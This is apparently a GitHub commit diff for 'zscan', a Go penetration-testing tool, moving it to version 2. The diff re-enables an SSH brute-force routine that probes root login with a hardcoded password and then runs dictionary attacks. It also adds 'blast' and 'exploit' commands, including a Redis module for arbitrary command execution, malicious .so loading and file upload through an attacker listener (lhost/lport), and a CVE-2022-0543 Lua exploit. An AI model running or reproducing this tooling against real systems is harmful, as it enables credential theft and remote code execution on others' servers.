更新到v2版本

zyylhn · Mar 20, 2022 · f98d9a7 · f98d9a7
1 parent 7f78690
commit f98d9a7
Show file tree

Hide file tree

Showing 39 changed files with 1,594 additions and 1,418 deletions.
diff --git a/README.md b/README.md
diff --git a/cmd/all.go b/cmd/all.go
@@ -5,6 +5,7 @@ import (
 	"github.com/spf13/cobra"
 	"strings"
 	"time"
+	"zscan/config"
 )
 
 var notburp bool
@@ -40,7 +41,7 @@ func allmode()  {
 	//	ps_port=little_port
 	//}
 	if ps_port=="l"{
-		ps_port=little_port
+		ps_port=config.Little_port
 	}
 	ports, err := Parse_Port(ps_port)
 	Checkerr(err)
@@ -58,37 +59,37 @@ func Connectall(ip string, port int) (string, int, error,[]string) {
 		addr:=fmt.Sprintf("%v:%v",ip,port)
 		Output(fmt.Sprintf("\rFind port %v:%v\r\n", ip, port),White)
 		switch port {
-		//case 22:
-		//	if !notburp{
-		//		if Verbose{
-		//			fmt.Println(Yellow("\rStart burp ssh : ",ip,":",port))
-		//		}
-		//		name:="root,admin,ssh"
-		//		if Username!=""{
-		//			name=Username
-		//		}
-		//		_,f,_:=ssh_auto("root","Ksdvfjsxc",ip)
-		//		if f{
-		//			Output(fmt.Sprintf("[-]%v Don't allow root login:%v \n","ssh",ip),Yellow)
-		//			var re []string
-		//			if strings.Contains(Username,"root"){
-		//				sl:=strings.Split(Username,",")
-		//				for _,i:=range sl{
-		//					if i=="root"{
-		//						continue
-		//					}
-		//					re=append(re,i)
-		//				}
-		//			}
-		//			Username=strings.Join(re,",")
-		//		}
-		//		startburp:=NewBurp(Password,name,Userdict,Passdict,ip,ssh_auto,10)
-		//		relust:=startburp.Run()
-		//		if relust!=""{
-		//			return ip,port,nil,[]string{relust}
-		//		}
-		//	}
-		//	return ip,port,nil,nil
+		case 22:
+			if !notburp{
+				if Verbose{
+					fmt.Println(Yellow("\rStart burp ssh : ",ip,":",port))
+				}
+				name:="root,admin,ssh"
+				if Username!=""{
+					name=Username
+				}
+				_,f,_:=ssh_auto("root","Ksdvfjsxc",ip)
+				if f{
+					Output(fmt.Sprintf("[-]%v Don't allow root login:%v \n","ssh",ip),Yellow)
+					var re []string
+					if strings.Contains(Username,"root"){
+						sl:=strings.Split(Username,",")
+						for _,i:=range sl{
+							if i=="root"{
+								continue
+							}
+							re=append(re,i)
+						}
+					}
+					Username=strings.Join(re,",")
+				}
+				startburp:=NewBurp(Password,name,Userdict,Passdict,ip,ssh_auto,10)
+				relust:=startburp.Run()
+				if relust!=""{
+					return ip,port,nil,[]string{relust}
+				}
+			}
+			return ip,port,nil,nil
 		case 3306:
 			if !notburp{
 				if Verbose{
@@ -327,11 +328,11 @@ func Connectall(ip string, port int) (string, int, error,[]string) {
 
 
 func init() {
-	rootCmd.AddCommand(allCmd)
+	RootCmd.AddCommand(allCmd)
 	allCmd.Flags().StringVar(&Hostfile,"hostfile","","Set host file")
 	allCmd.Flags().BoolVarP(&useicmp,"icmp","i",false,"Icmp packets are sent to check whether the host is alive(need root)")
 	allCmd.Flags().StringVarP(&Hosts, "host", "H", "", "Set `hosts`(The format is similar to Nmap) eg:192.168.1.1/24,172.16.95.1-100,127.0.0.1")
-	allCmd.Flags().StringVarP(&ps_port, "port", "p", default_port, "Set `port` eg:1-1000,3306,3389 or use \" zscan all -p l\" ) to scan less port（thirty port）")
+	allCmd.Flags().StringVarP(&ps_port, "port", "p", config.Default_port, "Set `port` eg:1-1000,3306,3389 or use \" zscan all -p l\" ) to scan less port（thirty port）")
 	allCmd.Flags().BoolVar(&pingbefore, "noping", false, " Not ping before port scanning")
 	allCmd.Flags().StringVarP(&Password,"password","P","","Set postgres password")
 	allCmd.Flags().StringVarP(&Passdict,"passdict","","","Set postgres passworddict path")

diff --git a/cmd/blast.go b/cmd/blast.go
@@ -0,0 +1,15 @@
+package cmd
+
+import (
+	"github.com/spf13/cobra"
+)
+
+// blastCmd represents the blast command
+var blastCmd = &cobra.Command{
+	Use:   "blast",
+	Short: "Common service blasting",
+}
+
+func init() {
+	RootCmd.AddCommand(blastCmd)
+}
diff --git a/cmd/burp.go b/cmd/burp.go
@@ -6,6 +6,7 @@ import (
 	"os"
 	"strings"
 	"sync"
+	"zscan/config"
 )
 //var num int
 type Service func(user string,pass string,addr string)(error,bool,string)
@@ -79,19 +80,14 @@ func (b *Burp) Run() string {
 			close(b.password_ch)
 		}
 	default:
-		b.password_ch=make(chan string,len(pass_dict))
-		for _,i:=range pass_dict{
+		b.password_ch=make(chan string,len(config.Pass_dict))
+		for _,i:=range config.Pass_dict{
 			b.password_ch<-i
 		}
 		close(b.password_ch)
 	}
 	b.wg.Add(1)
 	go b.Gettasklist()
-	//if !No_progress_bar{
-	//	if !Verbose{
-	//		go bar()
-	//	}
-	//}
 	for i:=0;i<b.burpthread;i++{
 		b.wg.Add(1)
 		go b.Check()
@@ -103,9 +99,7 @@ func (b *Burp) Run() string {
 
 //读取密码到缓冲信道中
 func (b *Burp) Getpass()  {
-	//fmt.Println(LightCyan("Begin read pass"))
 	b.readdict_To_Ch(b.passdict,&b.password_ch)
-	//fmt.Println(LightCyan("Stop read pass"))
 }
 
 //读取用户名到列表中
@@ -144,9 +138,9 @@ func (b *Burp) Check()  {
 		if cancelled(b.stop) {
 			break
 		}
-		//if Verbose{
-		//	fmt.Println(Yellow(fmt.Sprintf("Test:%v %v %v",task.addr,task.username,task.password)))
-		//}
+		if Verbose{
+			fmt.Println(Yellow(fmt.Sprintf("Test:%v %v %v",task.addr,task.username,task.password)))
+		}
 		err,success,servername:=b.service(task.username,task.password,task.addr)
 		//num+=1
 		if err==nil&&success{

diff --git a/cmd/config.go b/cmd/config.go
diff --git a/cmd/exploit.go b/cmd/exploit.go
@@ -0,0 +1,15 @@
+package cmd
+
+import (
+	"github.com/spf13/cobra"
+)
+
+// exploitCmd represents the exploit command
+var exploitCmd = &cobra.Command{
+	Use:   "exploit",
+	Short: "sshlogin,redisexec",
+}
+
+func init() {
+	RootCmd.AddCommand(exploitCmd)
+}
diff --git a/cmd/exploitredis.go b/cmd/exploitredis.go
@@ -0,0 +1,138 @@
+package cmd
+
+import (
+	"context"
+	"fmt"
+	"github.com/go-redis/redis/v8"
+	"github.com/spf13/cobra"
+	"github.com/zyylhn/redis_rce/redisrce"
+	"os"
+	"strings"
+)
+
+var Lhost string
+var Lport int
+var Uploadfile bool
+var Exec bool
+var Lua bool
+var FilePath string
+var ServerPath string
+var SoFilePath string
+
+// rediseCmd represents the redise command
+var expredisCmd = &cobra.Command{
+	Use:   "redis",
+	Short: "Redis utilizes modules",
+	Run: func(cmd *cobra.Command, args []string) {
+		expRedis()
+	},
+}
+
+func expRedis()  {
+	if Hosts==""{
+		fmt.Println(Red("must set host"))
+		os.Exit(0)
+	}
+	redisclient:=redis_client(Username,Password,Hosts)
+	if _,f,_:=redis_auth("",Password,Hosts);!f{
+		fmt.Println(Red("Authentication error"))
+		os.Exit(0)
+	}
+	switch  {
+	case Command!="":
+		redis_exec(Command,redisclient)
+	case Lua:
+		redisrce.LuaEval(redisclient)
+	case Exec:
+		if Lhost==""{
+			fmt.Println(Red("must set lhost"))
+			os.Exit(0)
+		}
+		redisrce.RdisExec(redisclient,SoFilePath,ServerPath,Lhost,Lport)
+	case Uploadfile:
+		if FilePath==""||ServerPath==""||Lhost==""{
+			fmt.Println(Red("must set lhost,srcpath,dstpath"))
+			os.Exit(0)
+		}
+		redisrce.RedisUpload(redisclient,FilePath,ServerPath,Lhost,Lport)
+	default:
+		fmt.Println(LightGreen(getinfomation(redis_client("",Password,Hosts))))
+	}
+}
+
+func redis_exec(cmd string,client *redis.Client)  {
+	ctx:=context.Background()
+	var argsinterface []interface{}
+	args:=strings.Fields(cmd)
+	for _,arg:=range args{
+		argsinterface=append(argsinterface,arg)
+	}
+	val, err := client.Do(ctx,argsinterface...).Result()
+	redis_checkerr(val, err)
+}
+
+//命令执行模块的检查和输出函数
+func redis_checkerr(val interface{},err error)  {
+	if err != nil {
+		if err == redis.Nil {
+			fmt.Println(Red("Key does not exits"))
+			return
+		}
+		fmt.Println(Yellow(err))
+	}
+	switch v:=val.(type){
+	case string:
+		fmt.Println(v)
+	case []string:
+		fmt.Println(strings.Join(v," "))
+	default:
+		fmt.Println(v)
+	}
+}
+
+//获取redis基本信息
+func getinfomation(client *redis.Client) string {
+	var redis_version string
+	var osinfo string
+	var arch string
+	var executable string
+	var configfile string
+
+	val,err:=client.Do(context.Background(),"info").Result()
+	Checkerr(err)
+	info:=val.(string)
+	info_list:=strings.Split(info,"\r\n")
+	info_list=info_list[0:23]
+	for _,v:=range info_list{
+		switch  {
+		case strings.Contains(v,"redis_version:"):
+			redis_version=v
+		case strings.Contains(v,"os:"):
+			osinfo=v
+		case strings.Contains(v,"arch_bits:"):
+			arch=v
+		case strings.Contains(v,"executable:"):
+			executable=v
+		case strings.Contains(v,"config_file:"):
+			configfile=v
+		default:
+		}
+	}
+	return fmt.Sprintf("%v\n%v\n%v\n%v\n%v\n",redis_version,osinfo,arch,executable,configfile)
+}
+
+func init() {
+	exploitCmd.AddCommand(expredisCmd)
+	expredisCmd.Flags().StringVarP(&Hosts,"host","H","","Set redis server host")
+	expredisCmd.Flags().IntVarP(&redis_port,"port","p",6379,"Set redis server port")
+	expredisCmd.Flags().StringVarP(&Command,"command","c","","Set the command you want to execute eg:(zscan exploit redis -H 172.16.95.16 -P 123456 -c \"keys *\")")
+	expredisCmd.Flags().StringVarP(&Password,"password","P","","Set redis password")
+	expredisCmd.Flags().StringVar(&FilePath,"srcpath","","set upload file path")
+	expredisCmd.Flags().StringVar(&ServerPath,"dstpath","","set target path")
+	expredisCmd.Flags().StringVar(&SoFilePath,"so","","set .so file path")
+	expredisCmd.Flags().BoolVar(&Uploadfile,"upload",false,"use upload mode")
+	expredisCmd.Flags().BoolVar(&Exec,"exec",false,"use execute the command mode")
+	expredisCmd.Flags().StringVar(&Lhost,"lhost","","set listen host(!!!Make sure the target has access!!!)")
+	expredisCmd.Flags().IntVar(&Lport,"lport",20001,"set listen port(!!!Make sure the target has access!!!)")
+	expredisCmd.Flags().BoolVar(&Lua,"lua",false,"use CVE-2022-0543 to attack")
+}
diff --git a/cmd/ftp.go b/cmd/ftp.go
@@ -69,52 +69,22 @@ func ftp_auth(username,password,ip string) (error,bool,string) {
 	if err == nil {
 		err = conn.Login(username, password)
 		if err == nil {
-			if Command != "" {
-				output, err := FTPExec(conn)
-				if err == nil {
-					fmt.Println(output)
-				}
-			}
 			return err,true,"ftp"
 		}
 		return err,false,"ftp"
 	}
 	return err,false,"ftp"
 }
 
-func FTPExec(client *ftp.ServerConn) (string, error) {
-
-	fileList, err := client.List("")
-	if err != nil {
-		return "", err
-	}
-
-	defer client.Logout()
-	defer client.Quit()
-
-	var s string
-	for _, file := range fileList {
-		var fileType string
-		if file.Type == 1 {
-			fileType = "directory"
-		} else {
-			fileType = "file"
-		}
-		s += fmt.Sprintf("%-30s %-9s %-8d %s\n", file.Name, fileType, file.Size, file.Time.Format("2006-01-02T15:04:05.999999"))
-	}
-
-	return s, nil
-}
 
 
 func init() {
-	rootCmd.AddCommand(ftpCmd)
+	blastCmd.AddCommand(ftpCmd)
 	ftpCmd.Flags().StringVar(&Hostfile,"hostfile","","Set host file")
 	ftpCmd.Flags().StringVarP(&Hosts,"host","H","","Set ftp server host")
 	ftpCmd.Flags().IntVarP(&ftp_port,"port","p",21,"Set ftp server port")
 	ftpCmd.Flags().IntVarP(&burpthread,"burpthread","",100,"Set burp password thread(recommend not to change)")
 	ftpCmd.Flags().StringVarP(&Username,"username","U","","Set ftp username")
-	ftpCmd.Flags().StringVarP(&Command,"command","c","","Set the command you want to execute")
 	ftpCmd.Flags().StringVarP(&Password,"password","P","","Set ftp password")
 	ftpCmd.Flags().StringVarP(&Userdict,"userdict","","","Set ftp userdict path")
 	ftpCmd.Flags().StringVarP(&Passdict,"passdict","","","Set ftp passworddict path")

diff --git a/cmd/httpserver.go b/cmd/httpserver.go
@@ -207,7 +207,7 @@ func SimpleBasicAuth(user, password string) func(http.Handler) http.Handler {
 }
 
 func init() {
-	rootCmd.AddCommand(httpserverCmd)
+	serverCmd.AddCommand(httpserverCmd)
 	httpserverCmd.Flags().IntVarP(&maxupload,"size","s",20,"set max upload files size(mb)")
 	//httpserverCmd.Flags().BoolVarP(&allowupload,"upload","u",false,"allow upload,/u indicates the file upload path（Unauthorized authorization exists，finished off）")
 	httpserverCmd.Flags().StringVarP(&httpserveraddr,"addr","a","0.0.0.0:7001","set http server addr")